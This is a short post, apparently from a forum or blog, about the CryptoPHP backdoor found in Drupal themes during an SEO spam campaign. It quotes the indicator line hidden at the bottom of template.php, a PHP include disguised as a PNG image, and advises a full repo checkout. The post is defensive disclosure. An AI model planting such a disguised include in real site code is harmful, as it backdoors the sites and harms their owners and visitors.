The concept and practices with SEO Spam aren’t new, the scale of this campain with thousands and thousands of website CMS backdoored is however new and unseen.
Regarding Drupal org downloads the situation was not that bad:
We have only found Drupal themes containing the CryptoPHP backdoor. The backdoor can be found in the ‘template.php’ file, at the very bottom of the file a PHP snippet can be found similar to this:
<?php include('images/social.png'); ?>
At first site all code could look fine, allthough a theme with CryptoPHP can still be there. Full repo checkout should be performed. Abuse by those that malcreate software to spread pseudo-free malcode always has been and will be part of the software world. It is just injecting links to ruin your Google rep.